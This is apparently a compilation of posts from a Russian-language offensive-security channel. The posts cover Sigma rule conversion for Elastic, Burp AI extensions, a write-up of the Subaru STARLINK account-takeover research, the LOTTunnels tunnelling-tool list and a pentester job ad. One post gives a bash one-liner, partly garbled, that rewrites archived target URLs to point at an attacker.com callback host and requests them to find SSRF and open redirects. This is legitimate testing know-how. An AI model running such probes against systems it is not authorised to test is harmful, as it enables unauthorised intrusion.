Недавно мне попался интересный проект AttackRuleMap, который представляет собой маппинг тест-кейсов инструмента Atomic Red Team и соответствующих правил обнаружения в формате Sigma. Данный ресурс может быть очень полезен, чтобы обеспечить покрытие алертами большей части техник MITRE, особенно на ранних этапах уровня зрелости команды Detection Engineering.

Но далеко не все SIEM из коробки поддерживают этот универсальный формат для пра­вил обнаружения, поэтому если у вас в компании изпользуется, например Elastic SIEM, то потребуется конвертировать правила в KQL (Kibana Query Language) и EQL (Event Query Language).

Реализовать данную задачу можно с помощью pySigma и Sigma CLI, которые пришли на смену Sigmac. Раньше был еще онлайн-конвертер uncoder.io (на данный момент ресурс по какой-то причине лежит🤷‍♂️), который позволял просто в веб-интерфейсе конвертировать Sigma правила для выбранного SIEM (включая Elastic KQL, Elastic EQL).
При этом существуют некоторые недостатки связанные с конвертацией правил, которые описаны в этой статье.

Но тем не менее, мне кажется, это хорошая отправная точка для старта, когда в первую очередь необходимо обеспечить максимально возможное покрытие стандартных техник и процедур злоумышленников в короткие сроки😎

Всем привет!
Если этот пост опубликуется, значит канал разблокировали🎉

Хотел сказать огромное спасибо всем кто помог с решением вопроса и просто приходил в личку со словами поддержки🙏

Всем привет!
Небольшая заметка про поиск SSRF и Open Redirect😁 в составе пайплайнов автоматизации

waybackurls target.com | grep -E "/https?://|=https?://|=/.*" | while read url; do random=(opensslrand−base646∣tr−d ′ /+ ′ );murl=(echo $url | sed -E "s/(/|=)(https?://[^/&?]+)/\1http://attacker.com/$random/g;s/=/[^&]+/=http://attacker.com/$random/g") && echo "Requesting: $murl" && curl -so /dev/null --connect-timeout 5 "$murl"; done

🔴Этот bash скрипт использует утилиту waybackurls, чтобы получить список всех известных url для заданного домена target.com из архива Wayback Machine.
🔴 Фильтрует полученные url c помощью регулярки, оставляя только потенциально уязвимые, которые содержат:
/https://example.com, ?url=http://example.com и ?url=/example
🔴 Для каждого url из списка генерирует случайную строку длиной 6 символов с помощью openssl rand, заворачивает в base64 и удаляет символы / и + на выходе получается что-то такое -a1b2c3
🔴 Модифицирует каждый url, заменяя:
http://example.com на /http://attacker.com/random.
http://example.com на =http://attacker.com/random.
/example на =http://attacker.com/random
🔴 Выводит в консоль модифицированный url перед отправкой запроса либо сохраняет в файл echo "$(date '+%Y-%m-%d %H:%M:%S') Requesting: $murl" | tee -a log.txt
🔴 Отправляет запросы с помощью curl c ограничением время ответа 5 сек, чтобы логировать статус коды ответов можно добавить:
http_code=$(curl -so /dev/null --connect-timeout 5 -w "%{http_code}" "$murl")
echo "$(date '+%Y-%m-%d %H:%M:%S') Response [$http_code] from: $murl" >> responses.txt

В качестве сервера атакующего, чтобы ловить отстуки можно использовать что угодно, начиная от Burp Collaborator до interactsh на своем домене.

The future of security testing: harness AI-Powered Extensibility in Burp

В прошлом месяце Portswigger анонсировали поддержку AI-powered расширений для Burp Suite. По капотом как и положено используется Montoya API, который выпустили в 2022 году на смену устаревшему Burp Extender API (2005 год).

Взаимодействие с AI моделью реализовано через этот интерфейс, что позволяет разработчикам сосредоточиться на функциональности расширений, а не думать как подружить свое решение с API провайдера LLM, но ограничивает в выборе конкретной модели и придется платить Portswigger чтобы покупать токены. По дефолту каждому пользователю Pro версии доступно 10,000 free AI credits. Ну и существуют некоторые опасения относительно конфиденциальности данных, которые отправляются модели, которые авторы попробовали развеять в этой статье.

На данный момент в BApp Store доступны всего несколько AI-powered расширений:
☑️ AI HTTP Analyzer (для Pro версии)
☑️ Hackvertor c AI функциональностью (для Community версии)

И есть еще Bounty Prompt, который позволяет подключить в качестве модели любую из поддерживаемых Groq Cloud с помощью универсального API.

Для того чтобы поиграться самостоятельно нужен релиз версии Early Adopter 2025.2, который можно переключить в Settings ➡️ Suite ➡️ Updates ➡️ Channel: Early Adopter, но уже в этом месяце поддержка AI-powered расширений появиться в версии Stable.

Как вы думаете, таким образом, скайнет💀 подбирается все ближе или такая автоматизация рутины освободит нам время для более творческих задач? Оставляйте свое мнение в комментариях🙏

One LLM chat to rule them all

Использование больших языковых моделей в наши дни уже стало привычной рутиной для большинства людей во многих областях деятельности. Регулярно появляются новые модели с новой функциональностью, на примере с DeepSeek R1 спровоцировавшей панику на фондовом рынке в конце января. Мне как и думаю большинству из вас тогда сразу же захотелось ее потестировать, чтобы заставить бездушную машину поразмышлять о смысле жизни, будущем атакующей кибербезопасности и о том как Алексей Лукацкий может писать столько постов в своем канале🤠 а также других риторических вопросах.

Представляю вашему вниманию небольшой обзор двух достойных приложений с LLM чатами в веб-интерфейсе с открытым исходным, которые можно развернуть самостоятельно и значительно увеличить потенциал использования больших языковых моделей. А дочитав до конца вы узнаете, как получить в свое распоряжение API для более 100 различных моделей абсолютно бесплатно😎

Hacking Subaru: Tracking and Controlling Cars via the STARLINK Admin Panel

Пару недель назад легендарный исследователь Sam Curry опубликовал детали своего очередного ресерча, на этот раз под раздачу попали автомобили Subaru😎 Найденные баги позволяют открывать и заводить любой автомобиль удаленно, получать доступ к истории перемещений за последний год, получать доступ к личным данным (PII) владельцев и прочее.

Суть эксплуатации заключалась в реализации Account Takeover для служебного портала STARLINK, который является интерфейсом управления Subaru’s in-vehicle infotainment system, позволяющим сотрудникам компании удаленно управлять автомобилем (открывать/закрывать, включать/выключать зажигание)...через интернет🙈 С помощью перебора файлов в директории /assets/_js/ веб-сервера, был найден login.js, раскрывающий "особенности" функциональности сброса пароля, для которой достаточно отправить значение логина (email сотрудника) и новый пароль. Валидные почтовые аккаунты можно было энумерейтить через ручку /adminProfile/getSecurityQuestion.json?email=example@example.com которая возвращала секретные вопросы если аккаунт существует. Дальше был фееричный байпасс якобы 2FA, реализованного client-side через диалоговое окно HTMLDialogElement методом showModal()🤯
Таким образом можно было угнать/отслеживать любой автомобиль Subaru на территории США, Канады и Японии, уязвимости были устранены в течение 1 дня после репорта исследователя👍

По факту практически любой современный автомобиль представляет собой компьютер на колесах с кучей интеграций с различными сервисами производителя и если раньше для поиска критичных узявимостей был необходим физический доступ к самой машине, осциллограф, навыки автоэлектрики и механники, то сейчас вполне достаточно просто доступа к интернету, Burp'a и желания сделать свой автомобиль более безопасным🔥

Living Off The Tunnels

В полку Living Off The Land очередное пополнение - LOTTunnels, консолидированный список различных инструментов для туннелирования трафика, которые используются злоумышленниками для обеспечения доступа и извлечения информации во время кибератак.

На данный момент список включает всего 22 инструмента, но есть некоторые ранее незнакомые🙈
Ну и как community driven проект LOTTunnels будет дальше развиваться с помощью контрибьюторов. В описании утилит есть читшит, референсы и начальные методы обнаружения, лично мне не хватает только прайса и условий использования.

В любом случае это хорошая возможность включить новые инструменты в качестве тест-кейсов в сценарии киберучений в формате Purple Teaming😎

Penetration Tester в Wildberries
ЗП: до 450 000 рублей net
Уровень: Senior
Формат: удаленка или гибрид

Мы в поиске новых тиммейтов в APT Wildbears💜

💫 Чем предстоит заниматься:
• Проведение проектов по анализу защищенности веб и мобильных приложений
• Проведение проектов по тестированию на проникновение (внешняя и внутренняя инфраструктура в т.ч СУБД, системы виртуализации и контейнеризации)
• Поиск и эксплуатация уязвимостей веб и мобильных приложений
• Поиск и эксплуатация уязвимостей и недостатков конфигурации ОС Linux а также специфичных для нее сервисов
• Поиск и эксплуатация уязвимостей OC Windows и недостатков конфигурации Active Directory
• Участие в проведение киберучений (Purple Teaming) в формате активного взаимодействия с подразделениями SOC (разработка и реализация сценариев и тест-кейсов киберучений)
• Оформление найденных уязвимостей для отчетов по итогам проектов

❤️ Что для этого нужно:
• Знание любого языка программирования на уровне достаточном для понимания/создания эксплойтов и автоматизации задач по поиску уязвимостей
• Опыт проведения проектов по анализу защищенности веб и мобильных приложений
• Опыт проведения проектов по тестированию на проникновение (внешняя и внутренняя инфраструктура)
• Опыт поиска и эксплуатации уязвимостей веб и мобильных приложений
• Опыт поиска и эксплуатации уязвимостей ОС Linux
• Опыт поиска и эксплуатации уязвимостей и недостатков конфигурации AD

🤪 Будет плюсом:
• Образование (бакалавр, магистр) в одном из технических вузов РФ (МИФИ, МГТУ им. Баумана, МГУ)
• Выступления на крупных конференциях и митапах, например PHDays, OffZone, Standoff и других
• Наличие профильных сертификатов (OSCP, OSWE, OSEP, CRTO)
• Участие в CTF и Bug Bounty

🔥 Что мы предлагаем
• Полная удаленка или свободное посещение офисов в Москве и Санкт-Петербурге
• Оформление в аккредитованную IT-компанию (с поддержкой условий IT-ипотеки)
• Бесплатное питание при работе из офиса
• Скидки у партнеров по обучению и внутренний корпоративный университет
• ДМС со стоматологией (после 3-х месяцев испытательного срока)
• Оплачиваемые Day Off
• Еженедельные развлекательные события - от бизнес-завтраков до просмотра фильмов на проекторе в офисах

Контакты: @virecruiter 👀 или можно ко мне в ЛС